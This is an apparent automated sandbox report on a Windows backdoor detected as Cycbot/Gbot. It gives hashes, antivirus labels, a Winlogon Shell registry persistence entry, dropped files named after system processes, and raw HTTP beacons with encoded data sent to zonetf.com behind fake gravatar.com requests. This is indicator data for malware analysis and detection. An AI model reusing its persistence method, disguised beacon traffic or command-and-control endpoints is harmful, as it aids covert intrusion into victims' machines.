Analysis Date | 2014-06-27 16:27:07 |
---|---|
MD5 | 65384b11a8a9d821e9b75d5a21e94596 |
SHA1 | 383a667f581b04ccde922785bcc053359183863e |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 | |
---|---|---|
Section | .text md5: d688dffe645dbd92d1b1222ada9f85d8 sha1: 7ad01f3dca73817049463b99b24acb6cea482c52 size: 114688 | |
Section | .rdata md5: cfbc29d6d989b553e1271b736b53f45a sha1: 8b4a778039d1dac212d40e8c7bf975bffb1e89b6 size: 1024 | |
Section | .data md5: b98c34c00f7b3041f1673b36dcfe3ce5 sha1: 0189a115f508ff96ef8920c93e1e2f6726320bd8 size: 54784 | |
Section | .apexi md5: 3ed17bd054c4931219318e47016cbb1b sha1: be2fdf898ed843c4fcabd9da0a7333cd47940c91 size: 1024 | |
Timestamp | 2005-11-22 11:17:16 | |
Version | ProductVersion: 1.0.0.3 FileVersion: 1.0.0.3 PrivateBuild: 1686 | |
PEhash | a29b1e9ff59e26558a34c12665954db5eedb993e | |
IMPhash | 49a61c9f91380828577efbce215c05e3 | |
AV | 360 Safe | Gen:Trojan.Heur.KS.1 |
AV | Ad-Aware | Gen:Trojan.Heur.KS.1 |
AV | Alwil (avast) | Cybota [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Goolbot.G.gen!Eldorado |
AV | Avira (antivir) | BDS/Gbot.aida |
AV | CA (E-Trust Ino) | Win32/Cycbot.G!generic |
AV | CAT (quickheal) | Backdoor.Cycbot.B |
AV | ClamAV | no_virus |
AV | Dr. Web | BackDoor.Gbot.34 |
AV | Emsisoft | Gen:Trojan.Heur.KS.1 |
AV | Eset (nod32) | Win32/Kryptik.MIA |
AV | Fortinet | W32/FraudLoad.MK!tr |
AV | Frisk (f-prot) | W32/Goolbot.G.gen!Eldorado (generic, not disinfectable) |
AV | F-Secure | Gen:Trojan.Heur.KS.1 |
AV | Grisoft (avg) | Win32/Heri |
AV | Ikarus | Backdoor.Win32.Gbot |
AV | K7 | Backdoor ( 003210941 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Trojan.Agent |
AV | Mcafee | BackDoor-EXI.gen.i |
AV | Microsoft Security Essentials | Backdoor:Win32/Cycbot.G |
AV | MicroWorld (escan) | Gen:Trojan.Heur.KS.1 |
AV | Norman | winpe/Cycbot.BP |
AV | Rising | no_virus |
AV | Sophos | Mal/FakeAV-IS |
AV | Symantec | Backdoor.Cycbot!gen3 |
AV | Trend Micro | BKDR_CYCBOT.SMX |
AV | VirusBlokAda (vba32) | no_virus |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1 |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe |
Creates File | C:\Documents and Settings\Administrator\Application Data\dwm.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | C:\Documents and Settings\Administrator\Application Data\75DE.FFC |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | {61B98B86-5F44-42b3-BCA1-33904B067B81} |
Creates Mutex | {655A89EF-C8EC-4587-9504-3DB66A15085F} |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | {B37C48AF-B05C-4520-8B38-2FE181D5DC78} |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Creates Mutex | {35BCA615-C82A-4152-8857-BCC626AE4C8D} |
Winsock DNS | 127.0.0.1 |
Winsock DNS | gravatar.com |
Winsock DNS | extremerollerclub.com |
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
---|
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process | C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe |
---|
Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Network Details:
DNS | gravatar.com Type: A 192.0.80.239 |
---|---|
DNS | gravatar.com Type: A 192.0.80.240 |
DNS | gravatar.com Type: A 192.0.80.241 |
DNS | gravatar.com Type: A 192.0.80.242 |
DNS | zonetf.com Type: A 208.73.211.163 |
DNS | zonetf.com Type: A 208.73.211.174 |
DNS | zonetf.com Type: A 208.73.211.175 |
DNS | zonetf.com Type: A 208.73.211.193 |
DNS | zonetf.com Type: A 208.73.211.242 |
DNS | zonetf.com Type: A 208.73.211.163 |
DNS | zonetf.com Type: A 208.73.211.174 |
DNS | zonetf.com Type: A 208.73.211.175 |
DNS | zonetf.com Type: A 208.73.211.193 |
DNS | zonetf.com Type: A 208.73.211.242 |
DNS | extremerollerclub.com Type: A |
HTTP GET | http://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v53=3&tq=gKZEtzyslLXoMNy5xQPoP0nd9IUXLoYgtJhBbSLy3unUwf7inVJlR%2FVodhhsWm7dK45EsPE93GTsU05s%2B5iIkXauPEOgE9Xtsc0gytX3t%2BkW%2F1198mh4Pl%2BVaZkbdS05ZdZ91VOHg7h84J2%2FrEOdcRJHIJqGpQbqaixD9uwUaoSFIaEYR6yeRCErf8pHvcTm3TDbRhGIhr%2FZ3Noy3xUl3h3poZnH5hkX4ZXr6WXK%2BsxgNMpzkR8ZVVoprJuvNFXklc1cB0rC5UwCS%2FPFiByi1HhSw0Gl0wz0FDmXskLYZLCnNNjP3p%2FodepO%2BA1T2LAxh User-Agent: mozilla/2.0 |
HTTP POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
HTTP POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
HTTP POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
HTTP POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNw1Kv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
HTTP POST | http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
Flows TCP | 192.168.1.1:1031 ➝ 192.0.80.239:80 |
Flows TCP | 192.168.1.1:1033 ➝ 208.73.211.163:80 |
Flows TCP | 192.168.1.1:1034 ➝ 208.73.211.163:80 |
Flows TCP | 192.168.1.1:1035 ➝ 208.73.211.163:80 |
Flows TCP | 192.168.1.1:1036 ➝ 208.73.211.163:80 |
Flows TCP | 192.168.1.1:1037 ➝ 208.73.211.163:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f617661 7461722e 7068703f GET /avatar.php? 0x00000010 (00016) 67726176 61746172 5f69643d 66326133 gravatar_id=f2a3 0x00000020 (00032) 38383961 66663666 63393731 31613363 889aff6fc9711a3c 0x00000030 (00048) 62636665 36343036 37626532 3f763533 bcfe64067be2?v53 0x00000040 (00064) 3d332674 713d674b 5a45747a 79736c4c =3&tq=gKZEtzyslL 0x00000050 (00080) 586f4d4e 79357851 506f5030 6e643949 XoMNy5xQPoP0nd9I 0x00000060 (00096) 55584c6f 5967744a 68426253 4c793375 UXLoYgtJhBbSLy3u 0x00000070 (00112) 6e557766 37696e56 4a6c5225 3246566f nUwf7inVJlR%2FVo 0x00000080 (00128) 64686873 576d3764 4b343545 73504539 dhhsWm7dK45EsPE9 0x00000090 (00144) 33475473 55303573 25324235 69496b58 3GTsU05s%2B5iIkX 0x000000a0 (00160) 61755045 4f674539 58747363 30677974 auPEOgE9Xtsc0gyt 0x000000b0 (00176) 58337425 32426b57 25324631 3139386d X3t%2BkW%2F1198m 0x000000c0 (00192) 6834506c 25324256 615a6b62 64533035 h4Pl%2BVaZkbdS05 0x000000d0 (00208) 5a645a39 31564f48 67376838 344a3225 ZdZ91VOHg7h84J2% 0x000000e0 (00224) 32467245 4f646352 4a48494a 71477051 2FrEOdcRJHIJqGpQ 0x000000f0 (00240) 62716169 78443975 7755616f 53464961 bqaixD9uwUaoSFIa 0x00000100 (00256) 45595236 79655243 45726638 70487663 EYR6yeRCErf8pHvc 0x00000110 (00272) 546d3354 44625268 47496872 2532465a Tm3TDbRhGIhr%2FZ 0x00000120 (00288) 334e6f79 3378556c 33683370 6f5a6e48 3Noy3xUl3h3poZnH 0x00000130 (00304) 35686b58 345a5872 3657584b 25324273 5hkX4ZXr6WXK%2Bs 0x00000140 (00320) 78674e4d 707a6b52 385a5656 6f70724a xgNMpzkR8ZVVoprJ 0x00000150 (00336) 75764e46 586b6c63 31634230 72433555 uvNFXklc1cB0rC5U 0x00000160 (00352) 77435325 32465046 69427969 31486853 wCS%2FPFiByi1HhS 0x00000170 (00368) 7730476c 30777a30 46446d58 736b4c59 w0Gl0wz0FDmXskLY 0x00000180 (00384) 5a4c436e 4e4e6a50 33702532 466f6465 ZLCnNNjP3p%2Fode 0x00000190 (00400) 704f2532 42413154 324c4178 68204854 pO%2BA1T2LAxh HT 0x000001a0 (00416) 54502f31 2e300d0a 436f6e6e 65637469 TP/1.0..Connecti 0x000001b0 (00432) 6f6e3a20 636c6f73 650d0a48 6f73743a on: close..Host: 0x000001c0 (00448) 20677261 76617461 722e636f 6d0d0a41 gravatar.com..A 0x000001d0 (00464) 63636570 743a202a 2f2a0d0a 55736572 ccept: */*..User 0x000001e0 (00480) 2d416765 6e743a20 6d6f7a69 6c6c612f -Agent: mozilla/ 0x000001f0 (00496) 322e300d 0a0d0a 2.0.... 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 4e6f5825 32425039 68253242 49307344 NoX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a682532 464d6525 3242636f OhLgjh%2FMe%2Bco 0x000000c0 (00192) 4a755825 3242534e 786c4b76 39373558 JuX%2BSNxlKv975X 0x000000d0 (00208) 6c6d3547 20485454 502f312e 310d0a48 lm5G HTTP/1.1..H 0x000000e0 (00224) 6f73743a 207a6f6e 6574662e 636f6d0d ost: zonetf.com. 0x000000f0 (00240) 0a557365 722d4167 656e743a 204d6f7a .User-Agent: Moz 0x00000100 (00256) 696c6c61 2f342e30 2028636f 6d706174 illa/4.0 (compat 0x00000110 (00272) 69626c65 3b204d53 49452036 2e303b20 ible; MSIE 6.0; 0x00000120 (00288) 57696e64 6f777320 4e542035 2e31290d Windows NT 5.1). 0x00000130 (00304) 0a436f6e 74656e74 2d4c656e 6774683a .Content-Length: 0x00000140 (00320) 20300d0a 436f6e6e 65637469 6f6e3a20 0..Connection: 0x00000150 (00336) 636c6f73 650d0a0d 0a634230 72433555 close....cB0rC5U 0x00000160 (00352) 77435325 32465046 69427969 31486853 wCS%2FPFiByi1HhS 0x00000170 (00368) 7730476c 30777a30 46446d58 736b4c59 w0Gl0wz0FDmXskLY 0x00000180 (00384) 5a4c436e 4e4e6a50 33702532 466f6465 ZLCnNNjP3p%2Fode 0x00000190 (00400) 704f2532 42413154 324c4178 68204854 pO%2BA1T2LAxh HT 0x000001a0 (00416) 54502f31 2e300d0a 436f6e6e 65637469 TP/1.0..Connecti 0x000001b0 (00432) 6f6e3a20 636c6f73 650d0a48 6f73743a on: close..Host: 0x000001c0 (00448) 20677261 76617461 722e636f 6d0d0a41 gravatar.com..A 0x000001d0 (00464) 63636570 743a202a 2f2a0d0a 55736572 ccept: */*..User 0x000001e0 (00480) 2d416765 6e743a20 6d6f7a69 6c6c612f -Agent: mozilla/ 0x000001f0 (00496) 322e300d 0a0d0a 2.0.... 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 4e6f5825 32425039 68253242 49307344 NoX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a683838 79253242 636f4a75 OhLgjh88y%2BcoJu 0x000000c0 (00192) 58253242 534e7846 4b763937 35586c6d X%2BSNxFKv975Xlm 0x000000d0 (00208) 35472048 5454502f 312e310d 0a486f73 5G HTTP/1.1..Hos 0x000000e0 (00224) 743a207a 6f6e6574 662e636f 6d0d0a55 t: zonetf.com..U 0x000000f0 (00240) 7365722d 4167656e 743a204d 6f7a696c ser-Agent: Mozil 0x00000100 (00256) 6c612f34 2e302028 636f6d70 61746962 la/4.0 (compatib 0x00000110 (00272) 6c653b20 4d534945 20362e30 3b205769 le; MSIE 6.0; Wi 0x00000120 (00288) 6e646f77 73204e54 20352e31 290d0a43 ndows NT 5.1)..C 0x00000130 (00304) 6f6e7465 6e742d4c 656e6774 683a2030 ontent-Length: 0 0x00000140 (00320) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000150 (00336) 6f73650d 0a0d0a3c 6872202f 3e0a2020 ose....<hr />. 0x00000160 (00352) 3c616464 72657373 3e4d6963 726f736f <address>Microso 0x00000170 (00368) 66742d49 49532f37 2e303c2f 61646472 ft-IIS/7.0</addr 0x00000180 (00384) 6573733e 0a20203c 2f626f64 793e0a3c ess>. </body>.< 0x00000190 (00400) 2f68746d 6c3e0a /html>. 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 4e6f5825 32425039 68253242 49307344 NoX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a683838 42537225 32466525 OhLgjh88BSr%2Fe% 0x000000c0 (00192) 32425635 5a755267 25334425 33442048 2BV5ZuRg%3D%3D H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a207a TTP/1.1..Host: z 0x000000e0 (00224) 6f6e6574 662e636f 6d0d0a55 7365722d onetf.com..User- 0x000000f0 (00240) 4167656e 743a204d 6f7a696c 6c612f34 Agent: Mozilla/4 0x00000100 (00256) 2e302028 636f6d70 61746962 6c653b20 .0 (compatible; 0x00000110 (00272) 4d534945 20362e30 3b205769 6e646f77 MSIE 6.0; Window 0x00000120 (00288) 73204e54 20352e31 290d0a43 6f6e7465 s NT 5.1)..Conte 0x00000130 (00304) 6e742d4c 656e6774 683a2030 0d0a436f nt-Length: 0..Co 0x00000140 (00320) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x00000150 (00336) 0a0d0a73 650d0a0d 0a634230 72433555 ...se....cB0rC5U 0x00000160 (00352) 77435325 32465046 69427969 31486853 wCS%2FPFiByi1HhS 0x00000170 (00368) 7730476c 30777a30 46446d58 736b4c59 w0Gl0wz0FDmXskLY 0x00000180 (00384) 5a4c436e 4e4e6a50 33702532 466f6465 ZLCnNNjP3p%2Fode 0x00000190 (00400) 704f2532 42413154 324c4178 68204854 pO%2BA1T2LAxh HT 0x000001a0 (00416) 54502f31 2e300d0a 436f6e6e 65637469 TP/1.0..Connecti 0x000001b0 (00432) 6f6e3a20 636c6f73 650d0a48 6f73743a on: close..Host: 0x000001c0 (00448) 20677261 76617461 722e636f 6d0d0a41 gravatar.com..A 0x000001d0 (00464) 63636570 743a202a 2f2a0d0a 55736572 ccept: */*..User 0x000001e0 (00480) 2d416765 6e743a20 6d6f7a69 6c6c612f -Agent: mozilla/ 0x000001f0 (00496) 322e300d 0a0d0a 2.0.... 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 4e6f5825 32425039 68253242 49307344 NoX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a683873 47253242 636f4a75 OhLgjh8sG%2BcoJu 0x000000c0 (00192) 58253242 534e7731 4b763937 35586c6d X%2BSNw1Kv975Xlm 0x000000d0 (00208) 35472048 5454502f 312e310d 0a486f73 5G HTTP/1.1..Hos 0x000000e0 (00224) 743a207a 6f6e6574 662e636f 6d0d0a55 t: zonetf.com..U 0x000000f0 (00240) 7365722d 4167656e 743a204d 6f7a696c ser-Agent: Mozil 0x00000100 (00256) 6c612f34 2e302028 636f6d70 61746962 la/4.0 (compatib 0x00000110 (00272) 6c653b20 4d534945 20362e30 3b205769 le; MSIE 6.0; Wi 0x00000120 (00288) 6e646f77 73204e54 20352e31 290d0a43 ndows NT 5.1)..C 0x00000130 (00304) 6f6e7465 6e742d4c 656e6774 683a2030 ontent-Length: 0 0x00000140 (00320) 0d0a436f 6e6e6563 74696f6e 3a20636c ..Connection: cl 0x00000150 (00336) 6f73650d 0a0d0a3c 6872202f 3e0a2020 ose....<hr />. 0x00000160 (00352) 3c616464 72657373 3e4d6963 726f736f <address>Microso 0x00000170 (00368) 66742d49 49532f37 2e303c2f 61646472 ft-IIS/7.0</addr 0x00000180 (00384) 6573733e 0a20203c 2f626f64 793e0a3c ess>. </body>.< 0x00000190 (00400) 2f68746d 6c3e0a /html>. 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 4e6f5825 32425039 68253242 49307344 NoX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a682532 46383225 3242636f OhLgjh%2F82%2Bco 0x000000c0 (00192) 4a745825 3242534e 78723579 676d3143 JtX%2BSNxr5ygm1C 0x000000d0 (00208) 346c4b76 39373558 6c6d3547 20485454 4lKv975Xlm5G HTT 0x000000e0 (00224) 502f312e 310d0a48 6f73743a 207a6f6e P/1.1..Host: zon 0x000000f0 (00240) 6574662e 636f6d0d 0a557365 722d4167 etf.com..User-Ag 0x00000100 (00256) 656e743a 204d6f7a 696c6c61 2f342e30 ent: Mozilla/4.0 0x00000110 (00272) 2028636f 6d706174 69626c65 3b204d53 (compatible; MS 0x00000120 (00288) 49452036 2e303b20 57696e64 6f777320 IE 6.0; Windows 0x00000130 (00304) 4e542035 2e31290d 0a436f6e 74656e74 NT 5.1)..Content 0x00000140 (00320) 2d4c656e 6774683a 20300d0a 436f6e6e -Length: 0..Conn 0x00000150 (00336) 65637469 6f6e3a20 636c6f73 650d0a0d ection: close... 0x00000160 (00352) 0a435325 32465046 69427969 31486853 .CS%2FPFiByi1HhS 0x00000170 (00368) 7730476c 30777a30 46446d58 736b4c59 w0Gl0wz0FDmXskLY 0x00000180 (00384) 5a4c436e 4e4e6a50 33702532 466f6465 ZLCnNNjP3p%2Fode 0x00000190 (00400) 704f2532 42413154 324c4178 68204854 pO%2BA1T2LAxh HT 0x000001a0 (00416) 54502f31 2e300d0a 436f6e6e 65637469 TP/1.0..Connecti 0x000001b0 (00432) 6f6e3a20 636c6f73 650d0a48 6f73743a on: close..Host: 0x000001c0 (00448) 20677261 76617461 722e636f 6d0d0a41 gravatar.com..A 0x000001d0 (00464) 63636570 743a202a 2f2a0d0a 55736572 ccept: */*..User 0x000001e0 (00480) 2d416765 6e743a20 6d6f7a69 6c6c612f -Agent: mozilla/ 0x000001f0 (00496) 322e300d 0a0d0a 2.0....
Strings
. .o..}........ a.6&.t=.....3z5..m . U..u. T]..B. .*....{[..N....i ......N3./}q.r.B... S......~>=qp...51.Y]h.. .Wk . . V. . 040904b0 1.0.0.3 1686 2C2C AqAD c`GP DB`A "EC" FileVersion jjjjjj PCGF PrivateBuild ProductVersion qTTac RF`# RqR" StringFileInfo TASa TIMES NEW ROMAN Translation UsVW VarFileInfo V"rj VS_VERSION_INFO .<(}<@ 11= K>VeiS 1Nx_y{ 1-R h} 1/S=[L 2S*J_3, 2u4Ld[v& 2VVxhL 3e,"4=~ &3L+K p8 svdB 5 "o.Sh `5wjL} 63w=a8 +%7aui1X "!:|8- A)A$]Ms &AIq/s .apexi b<sGZ3 BzIMZT] C$d+~L CheckRemoteDebuggerPresent cN@/r CreateWindowExW cR!O0| D2MC^h7 @.data dFW`sZ3 dmKKp Eh&ljn7_ EndDialog EnumResourceTypesW FC2-y0 GetFileType GetParent GetStartupInfoA GetWindowInfo G-hC3G g> u7A Gv>eQF >g^|yx GZw7FWo HeapCreate %}h/ncKB/ h tLCl I$;8oC I9\BoC InitializeCriticalSection I=_t%m I@Uum: j<4m+i J)tV=D K9 &F+ KERNEL32.dll (kI;i*q)%" KUW\+~0k @\KWEI K~xEB_4S]G l].$#:5 =lDv/9 @&%Lf} ljm$(V LoadCursorW |Lq[gz LresultFromObject lstrcpynW l%upaX M[>,%* m6y5yr mA-Jo&_rG MessageBoxW :M$nxhuQk# MXn+\q]" >MZL;k N0-or5 nn8 qc +#N/vk n)+wki O}3|qq |oCa"[uV OLEACC.dll pp7VK# *PQi4C P$s#g8 (qj%PAm !|Q) l r|3X%r r6:VH9M `.rdata RegisterClassExW R]G4)c) r'IssK RkH.%3( |R>,L2I ")|(~T !This program cannot be run in DOS mode. TlsAlloc TlsFree TlsGetValue "tN1{@ ;t;sO |Tv|:Ll ueg]ks USER32.dll u@Z+gT !v_OG& V =R]wP w9#wkZ @!w;a@km WVB.tsJ Wv}l{a' <|ww.w6 x*:hA9 XL4l,x xR[4tI (#: Y/ y}c99IE YiX[=+ y>; ~N ynd=<gz {;Y}\+t}hx Z6,dmi{ zCwE9 -Zjs<J z]vD3!@ zwb}#g